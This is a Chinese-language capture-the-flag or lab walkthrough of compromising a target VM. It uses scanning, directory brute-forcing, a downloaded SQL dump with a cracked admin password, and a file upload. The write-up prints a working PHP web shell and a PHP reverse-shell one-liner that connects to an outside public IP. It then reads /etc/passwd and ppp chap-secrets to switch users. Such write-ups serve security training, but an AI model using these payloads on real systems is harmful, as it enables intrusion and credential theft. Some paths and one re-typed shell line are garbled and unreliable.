地址:192.168.100.138

信息收集——主机发现

1. 查看Kali的IP信息;(IP:192.168.220.128)

image-20211225161537874

2.扫描主机(netdiscover)

netdiscover -i eth0 -r http://192.168.100.138

Netdiscover: -i 指定网卡 -r 指定网段

image-20211225162243351

信息收集——端口扫描

1.扫描端口(masscan nmap)

image-20211225162536032

啊咧 好像不太行 那就用nmap了

image-20211225164053046

提示"130错误" 查了查发现是编码或者字符一类的错误 不打紧 我们想要的端口信息出来了

这里我们可以看到 IP 的80端口是打开的

接着我们就下一步

信息收集——目录扫描

先进入192.168.100.138,出现了那么一个界面

image-20211219190449801

御剑

image-20211221232834918

看它的源码好像也没有什么发现

image-20211221232928620

那接下来就是常规思路,爆破网站的目录

 gobuster dir -u  http://192.168.100.138/lot -w /user/share/wordlists/dirb/big.txt -x php txt 

image-20211226183453820

目录查询

在database目录下可以看到数据库lot_db.sql的信息,下载下来

发现数据库密码(未解码)

image-20211226184252620

密码为MD5加密 通过解码得

image-20211229144033363

在admin目录下输入账号密码

image-20211226190324312

4.文件上传

上传一个带有一句话木马的2.php文件

image-20211229100811112

并在HOME中找到上传的内容检查

image-20211229101537256

使用蚁剑连接

image-20211229101639634

5.反弹shell


https://blog.csdn.net/qq_36938617/article/details/95234909?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&utm_relevant_index=1

关于服务器防火墙命令

https://blog.csdn.net/luansj/article/details/97272672?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164069848916780271581140%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=164069848916780271581140&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-97272672.pc_search_insert_es_download&utm_term=linux%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4&spm=1018.2226.3001.41874

linux常用指令


在服务器端(攻击机)输入nc -lvnp 6666(前提是我们已经打开了服务器6666端口)(-l 开启监听 -p 指定一个端口 -v 显示详细输出)

image-20211229093609541

先将一个带有<?php $a=$_POST['a']; system($a); ?>的1.php放入到靶机(被攻击机)(需要打开蚁剑放入到连接的目录下)的网址下如:http://192.168.100.138/lot/admin/assets/uploads/maps/1.php

因为菜刀连不上,我们直接添加一个php来执行系统命令

< ?php $a=$POST['a'];system($a);? >

传入参数并以系统命令执行

我们先访问此链接进去后检查进入hackbar

image-20211229093837074

a=php -r '$s=fsockopen("101.35.125.7",6666);$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);'

这样我们传入参数,相当于对方服务器主动连接我们的服务器,并进行读写

101.35.125.7为服务器公网IP

发送后服务器端image-20211229094040376

这时候可以用ls来检查是否成功,如果成功则会列出该目录下的所有子目录与文件

6.获取root权限

输入cat /etc/passwd

image-20211229094333003

发现root用户和ppp用户

cd /ect/root

cd /ect/ppp

image-20211229095130238

ppp用户中可以查看相关文件

在chap-secrets下寻找到ppp用户的密码

image-20211229095621809

使用su -与su不太同,使用su -时会失败。

使用su ppp指令切换至ppp用户,并输入id查看

image-20211229095149362

提权成功